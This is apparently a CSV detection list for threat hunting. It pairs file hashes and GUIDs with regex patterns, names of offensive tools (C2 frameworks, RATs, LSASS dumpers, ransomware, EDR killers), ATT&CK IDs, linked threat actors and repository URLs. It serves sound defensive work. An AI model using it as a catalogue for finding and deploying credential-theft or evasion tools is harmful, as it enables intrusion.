"*f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a*",".{0,1000}f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43851"
"*f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5*",".{0,1000}f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43852"
"*F2EC73D1-D533-4EE4-955A-A62E306472CC*",".{0,1000}F2EC73D1\-D533\-4EE4\-955A\-A62E306472CC.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","43853"
"*f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e*",".{0,1000}f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","#filehash","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","43854"
"*f2f1896de3273d47b9d6831b9ac66c1a8fbbde28eb433bef65495ffcb81c9105*",".{0,1000}f2f1896de3273d47b9d6831b9ac66c1a8fbbde28eb433bef65495ffcb81c9105.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","43855"
"*f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb*",".{0,1000}f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43856"
"*f2f43c5e7b7af02097483d4ea3ccd1bf1cf2b6a558e334a3c4821522a5214b73*",".{0,1000}f2f43c5e7b7af02097483d4ea3ccd1bf1cf2b6a558e334a3c4821522a5214b73.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","43857"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A35*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A35.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43865"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A35*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A35.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43866"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A40*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A40.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43867"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A40*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A40.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43868"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A45*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A45.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43869"
"*F3037587-1A3B-41F1-AA71-B026EFDB2A45*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A45.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43870"
"*f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9*",".{0,1000}f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","43873"
"*f32ec7c8c8843a5d12e2c0a9915e7616febf815ce6a9934f088ea0b2bd2fd5a0*",".{0,1000}f32ec7c8c8843a5d12e2c0a9915e7616febf815ce6a9934f088ea0b2bd2fd5a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43874"
"*f333b88f6b0f3260dd3f291b932816e055ee81fc1c94d1e5712f0848523dd706*",".{0,1000}f333b88f6b0f3260dd3f291b932816e055ee81fc1c94d1e5712f0848523dd706.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43875"
"*f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be*",".{0,1000}f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43876"
"*f33af2c7fab6a68954caa2271921e23eeb0e0af53370b0dcb736515bb092d8f5*",".{0,1000}f33af2c7fab6a68954caa2271921e23eeb0e0af53370b0dcb736515bb092d8f5.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","43879"
"*f33c6af5a1f10fd4f9aa0eaa6898825b52c9ed7a7871e4912bcd03551891cb4c*",".{0,1000}f33c6af5a1f10fd4f9aa0eaa6898825b52c9ed7a7871e4912bcd03551891cb4c.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","CVE-2020-0796","10","10","N/A","N/A","N/A","N/A","43880"
"*f34b6048a755da93e66d8335d69d98eecc76dcb4ea0e7b816dc9af12ba8b6b22*",".{0,1000}f34b6048a755da93e66d8335d69d98eecc76dcb4ea0e7b816dc9af12ba8b6b22.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","43881"
"*f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1*",".{0,1000}f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","43882"
"*f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98*",".{0,1000}f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","43883"
"*f34c21b84c272dfc122a605ee4089966bf16a2d4d4740cc9cbbd9bfc00d7090b*",".{0,1000}f34c21b84c272dfc122a605ee4089966bf16a2d4d4740cc9cbbd9bfc00d7090b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43884"
"*F34C5DF4-22A6-49CF-901E-D6DD338061F1*",".{0,1000}F34C5DF4\-22A6\-49CF\-901E\-D6DD338061F1.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","43885"
"*f35f77dc73c6960a95df7421fcddb14e8af5b769e93f56dafc47562eca566c2c*",".{0,1000}f35f77dc73c6960a95df7421fcddb14e8af5b769e93f56dafc47562eca566c2c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","43886"
"*f361e6e5c74be6d5ee9c3cf578d4855280b512ac95988f6afdcecefc917775c2*",".{0,1000}f361e6e5c74be6d5ee9c3cf578d4855280b512ac95988f6afdcecefc917775c2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","43887"
"*f36ae1ef8fa544943bbd65f44d53fd994b42c91042e133c69019c66e73b20278*",".{0,1000}f36ae1ef8fa544943bbd65f44d53fd994b42c91042e133c69019c66e73b20278.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","43888"
"*f372c2d7604f63043b3ffe8d382b6ac45a719bd125a7e7f13691eb223a8db509*",".{0,1000}f372c2d7604f63043b3ffe8d382b6ac45a719bd125a7e7f13691eb223a8db509.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","43890"
"*f379a925c80b2f5959d3b3a0658895f7dad370b7478736a2957bc1ae2b59f14c*",".{0,1000}f379a925c80b2f5959d3b3a0658895f7dad370b7478736a2957bc1ae2b59f14c.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","43891"
"*f37b4f47af2c937cd6ca8f380f2715c1b3fa9f97bd11d5abcac41e2e05a83c62*",".{0,1000}f37b4f47af2c937cd6ca8f380f2715c1b3fa9f97bd11d5abcac41e2e05a83c62.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","43892"
"*f389c18921fda9ff238dccfc99ab38aa4270f677cfaa38986d642473254e3226*",".{0,1000}f389c18921fda9ff238dccfc99ab38aa4270f677cfaa38986d642473254e3226.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43894"
"*f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82*",".{0,1000}f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43895"
"*f392e058d65cc84f23773a88424d5a9e6a6987f790c52e0fb032e8538b5aec36*",".{0,1000}f392e058d65cc84f23773a88424d5a9e6a6987f790c52e0fb032e8538b5aec36.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","43897"
"*f39405d1051750c03116c4e4894f67b95709e9143132392eddd3639a0882bda7*",".{0,1000}f39405d1051750c03116c4e4894f67b95709e9143132392eddd3639a0882bda7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43898"
"*f3a81e60a02caea629cba10af9f8bf769ca6d6e2d45d6228c30f3b544e1f7f09*",".{0,1000}f3a81e60a02caea629cba10af9f8bf769ca6d6e2d45d6228c30f3b544e1f7f09.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43900"
"*f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97*",".{0,1000}f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43901"
"*f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995*","f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43902"
"*f3acbb6add19742a56784205264a699f6604e1e64b391b9bad26f4745d3d7ed1*",".{0,1000}f3acbb6add19742a56784205264a699f6604e1e64b391b9bad26f4745d3d7ed1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","43903"
"*f3ad17104571c366fc2d5f3cacefdfd3cbc3f47195773b652a8c2eadc41624ca*",".{0,1000}f3ad17104571c366fc2d5f3cacefdfd3cbc3f47195773b652a8c2eadc41624ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43904"
"*f3b1c8cf0abdaad743182c96258f5e88a8522004724a781596e6663565e5c456*",".{0,1000}f3b1c8cf0abdaad743182c96258f5e88a8522004724a781596e6663565e5c456.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","43905"
"*f3b1f6c6ca346acab1afd2dc61c43588f4c0914c1a6d1247db3a46bbd3421b38*",".{0,1000}f3b1f6c6ca346acab1afd2dc61c43588f4c0914c1a6d1247db3a46bbd3421b38.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","#filehash","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","43906"
"*f3b3b2a5c53aadbd83530a0bf182d75766ebe5f85b0cfde3194b617becb558f5*",".{0,1000}f3b3b2a5c53aadbd83530a0bf182d75766ebe5f85b0cfde3194b617becb558f5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","43907"
"*f3b57e4b17458688b689824705327c1e854a796a4e027b6e34855627e79454c0*",".{0,1000}f3b57e4b17458688b689824705327c1e854a796a4e027b6e34855627e79454c0.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","43908"
"*f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef*",".{0,1000}f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","43909"
"*f3ba88e3c7410a48b8a15edccc2ededc4468d3babf5b9c07c4166cf58606f7d2*",".{0,1000}f3ba88e3c7410a48b8a15edccc2ededc4468d3babf5b9c07c4166cf58606f7d2.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","43910"
"*f3bdfbd2b36064266a9d9e4452aba93cb97980c37dbe472e0b3b72e1485500ab*",".{0,1000}f3bdfbd2b36064266a9d9e4452aba93cb97980c37dbe472e0b3b72e1485500ab.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","43911"
"*f3bfcbc52736f637b0bc239e31343cd8f33f6e51ea449799e69b4225df15e325*",".{0,1000}f3bfcbc52736f637b0bc239e31343cd8f33f6e51ea449799e69b4225df15e325.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43912"
"*F3C62326-E221-4481-AC57-EF7F76AAF27B*",".{0,1000}F3C62326\-E221\-4481\-AC57\-EF7F76AAF27B.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","#GUIDproject","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","43915"
